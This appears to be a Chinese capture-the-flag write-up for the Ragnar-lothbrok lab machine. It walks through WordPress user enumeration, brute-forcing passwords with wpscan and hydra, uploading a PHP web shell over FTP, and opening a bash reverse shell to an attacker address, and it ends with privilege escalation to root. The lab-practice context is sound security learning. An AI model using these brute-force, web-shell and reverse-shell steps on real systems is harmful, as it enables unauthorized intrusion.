码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Ragnar-lothbrok 靶机


    Ragnar-lothbrok

    信息搜集

    存活检测

    image-20231025221132716

    详细扫描

    image-20231025221227283

    后台网页扫描

    image-20231025221253760

    网站信息搜集

    • secret “秘密”网页

      image-20231025221349345

      将密文保存到 password.txt

    • 此页面使用了 wordpress CMS

      image-20231025221836685

    • 疑似用户 ragnar

    • wpscan 也爆破出了用户 ragnar

      wpscan --url http://10.4.7.155/wordpress/ --enumerate u 
      
      • 1

      image-20231025222706934

    密码获取

    • 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码

    尝试网页登录爆破

    wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt
    
    • 1

    爆破出密码 ubbe

    image-20231025223612116

    ssh 爆破

    hydra -l ragnar -P password.txt ssh://10.4.7.155
    
    • 1

    ragnar 密码为 lagertha

    image-20231025224147806

    漏洞利用

    • 查看 ftp 中有用的信息

      image-20231025224457074

    • 未搜集到有用信息

    • 网页登录

      10.4.7.155/wordpress/wp-login.php
      
      ragnar
      ubbe
      
      • 1
      • 2
      • 3
      • 4

      image-20231025224606889

      卡的登不上去

      image-20231025225020665

    • 直接尝试 ftp 上传一句话木马

      image-20231025224952782

      put shell.php
      
      • 1

      成功上传

      image-20231025225149229

    • 蚁剑连接,发现可以连接

      image-20231025225311439

    • 打开蚁剑中虚拟终端,反弹进 kali

      bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'
      
      • 1

      image-20231025225553201

      成功反弹

    提权

    • 信息搜集

      切换到 home 目录,发现有用户 ragnar

      image-20231025230050152

    • 尝试使用其 web 和 ftp 密码登录

      密码未 ftp 登陆密码 lagertha

      image-20231025230236343

    • 查找敏感文件

      在 秘密 文件中可以直接看到 root 加密后的密码

      image-20231025230835014

    • john 爆破

    • 切换 root

      成功提权

      image-20231026091720785

      image-20231026091711015

  • 相关阅读:
    《实用软件工程》课程教学大纲(Practicality Software Engineering)
    【三】ElasticSearch 索引操作
    C++程序的内存分区
    引擎上新|卡片焕新升级,信息高效呈现
    备忘录模式
    深度学习框架TensorFlow.NET环境搭建1(C#)
    从一篇AMA揭幕单慢雾安全技术
    JavaSE——方法、递归
    Unity-异步加载资源练习
    两种将JS关联数组转化为JSON格式字符串的方法
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/134048294
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号